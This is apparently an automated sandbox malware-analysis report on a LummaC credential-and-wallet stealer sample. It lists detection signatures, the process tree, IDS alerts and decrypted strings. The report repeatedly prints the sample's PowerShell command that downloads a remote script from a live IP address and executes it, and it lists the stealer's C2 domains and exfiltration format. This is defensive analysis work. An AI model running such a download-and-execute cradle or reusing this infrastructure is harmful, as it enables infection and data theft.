Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7IXl1M9JGV.exe

Overview

General Information

Sample name:7IXl1M9JGV.exe
Analysis ID:1551388
MD5:826ac9d03e37048df300b013335098d9
SHA1:a1c6214e85b826b769d931a20434224e42da28c1
SHA256:a0aeb837cb5e762fc0b7d657c71d343e765cccb5780cd315756f682418b3cdfe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • 7IXl1M9JGV.exe (PID: 9084 cmdline: "C:\Users\user\Desktop\7IXl1M9JGV.exe" MD5: 826AC9D03E37048DF300B013335098D9)
    • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9144 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 9176 cmdline: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 8728 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 8748 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • RegAsm.exe (PID: 1752 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • chrome.exe (PID: 4212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" MD5: BB7C48CDDDE076E7EB44022520F40F77)
            • chrome.exe (PID: 1664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
            • chrome.exe (PID: 9224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
  • svchost.exe (PID: 7444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["conceszustyb.shop", "moutheventushz.shop", "respectabosiz.shop", "worddosofrm.shop", "mutterissuen.shop", "nightybinybz.shop", "bakedstusteeb.shop", "standartedby.shop", "knifedxejsu.cyou"], "Build id": "HpOoIh--@topgcr"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7IXl1M9JGV.exe", ParentImage: C:\Users\user\Desktop\7IXl1M9JGV.exe, ParentProcessId: 9084, ParentProcessName: 7IXl1M9JGV.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9144, ProcessName: cmd.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", ProcessId: 8728, ProcessName: csc.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7IXl1M9JGV.exe", ParentImage: C:\Users\user\Desktop\7IXl1M9JGV.exe, ParentProcessId: 9084, ParentProcessName: 7IXl1M9JGV.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9144, ProcessName: cmd.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9176, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7IXl1M9JGV.exe", ParentImage: C:\Users\user\Desktop\7IXl1M9JGV.exe, ParentProcessId: 9084, ParentProcessName: 7IXl1M9JGV.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9144, ProcessName: cmd.exe
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 9176, TargetFilename: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 9176, ProcessName: powershell.exe
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 892, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7444, ProcessName: svchost.exe

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 9176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline", ProcessId: 8728, ProcessName: csc.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:14.245210+010020283713Unknown Traffic192.168.11.2049711104.21.19.177443TCP
      2024-11-07T17:55:15.081146+010020283713Unknown Traffic192.168.11.2049712104.21.19.177443TCP
      2024-11-07T17:55:21.478914+010020283713Unknown Traffic192.168.11.2049720104.21.19.177443TCP
      2024-11-07T17:55:22.553138+010020283713Unknown Traffic192.168.11.2049724104.21.19.177443TCP
      2024-11-07T17:55:23.297760+010020283713Unknown Traffic192.168.11.2049725104.21.19.177443TCP
      2024-11-07T17:55:24.379486+010020283713Unknown Traffic192.168.11.2049727104.21.19.177443TCP
      2024-11-07T17:55:25.581150+010020283713Unknown Traffic192.168.11.2049728104.21.19.177443TCP
      2024-11-07T17:55:26.470376+010020283713Unknown Traffic192.168.11.2049729104.21.19.177443TCP
      2024-11-07T17:55:28.150953+010020283713Unknown Traffic192.168.11.2049730104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:14.746759+010020546531A Network Trojan was detected192.168.11.2049711104.21.19.177443TCP
      2024-11-07T17:55:15.923601+010020546531A Network Trojan was detected192.168.11.2049712104.21.19.177443TCP
      2024-11-07T17:55:28.686722+010020546531A Network Trojan was detected192.168.11.2049730104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:14.746759+010020498361A Network Trojan was detected192.168.11.2049711104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:15.923601+010020498121A Network Trojan was detected192.168.11.2049712104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:14.245210+010020572851Domain Observed Used for C2 Detected192.168.11.2049711104.21.19.177443TCP
      2024-11-07T17:55:15.081146+010020572851Domain Observed Used for C2 Detected192.168.11.2049712104.21.19.177443TCP
      2024-11-07T17:55:21.478914+010020572851Domain Observed Used for C2 Detected192.168.11.2049720104.21.19.177443TCP
      2024-11-07T17:55:22.553138+010020572851Domain Observed Used for C2 Detected192.168.11.2049724104.21.19.177443TCP
      2024-11-07T17:55:23.297760+010020572851Domain Observed Used for C2 Detected192.168.11.2049725104.21.19.177443TCP
      2024-11-07T17:55:24.379486+010020572851Domain Observed Used for C2 Detected192.168.11.2049727104.21.19.177443TCP
      2024-11-07T17:55:25.581150+010020572851Domain Observed Used for C2 Detected192.168.11.2049728104.21.19.177443TCP
      2024-11-07T17:55:26.470376+010020572851Domain Observed Used for C2 Detected192.168.11.2049729104.21.19.177443TCP
      2024-11-07T17:55:28.150953+010020572851Domain Observed Used for C2 Detected192.168.11.2049730104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:11.639670+010020197142Potentially Bad Traffic192.168.11.2049710147.45.44.13180TCP
      2024-11-07T17:55:12.108473+010020197142Potentially Bad Traffic192.168.11.2049710147.45.44.13180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:13.869866+010020572841Domain Observed Used for C2 Detected192.168.11.20514541.1.1.153UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:27.930071+010020480941Malware Command and Control Activity Detected192.168.11.2049729104.21.19.177443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T17:55:12.109154+010028000291Attempted User Privilege Gain147.45.44.13180192.168.11.2049710TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: standartedby.shopAvira URL Cloud: Label: malware
      Source: moutheventushz.shopAvira URL Cloud: Label: malware
      Source: https://knifedxejsu.cyou/Avira URL Cloud: Label: malware
      Source: bakedstusteeb.shopAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
      Source: 7.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["conceszustyb.shop", "moutheventushz.shop", "respectabosiz.shop", "worddosofrm.shop", "mutterissuen.shop", "nightybinybz.shop", "bakedstusteeb.shop", "standartedby.shop", "knifedxejsu.cyou"], "Build id": "HpOoIh--@topgcr"}
      Source: 7IXl1M9JGV.exeReversingLabs: Detection: 13%
      Source: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dllJoe Sandbox ML: detected
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: moutheventushz.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: respectabosiz.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bakedstusteeb.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: conceszustyb.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nightybinybz.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: standartedby.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mutterissuen.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: worddosofrm.shop
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: knifedxejsu.cyou
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
      Source: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: HpOoIh--@topgcr
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00418D6F CryptUnprotectData,7_2_00418D6F
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir4212_1753283128Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_4212_794435973Jump to behavior
      Source: C:\Windows\System32\svchost.exeDirectory created: C:\Program Files\chrome_BITS_4212_794435973\BITA127.tmpJump to behavior
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49730 version: TLS 1.2
      Source: 7IXl1M9JGV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F8D4C FindFirstFileExW,0_2_00007FF7D77F8D4C

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h7_2_0041B840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-62492198h]7_2_0041B840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx-5424758Ch]7_2_0043D840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi+2DC2A8D6h]7_2_0043D840
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, eax7_2_004358F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h7_2_0043F880
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h7_2_00439140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000E7h]7_2_00439140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 3E416E49h7_2_00439140
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 33079CCDh7_2_0043F9D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+5E07836Bh]7_2_0041DAD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh7_2_0041A360
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h7_2_00438330
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], C0A4C970h7_2_00440330
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]7_2_00429C7C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebp, byte ptr [esp+eax]7_2_0043CCB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h7_2_0043CCB0
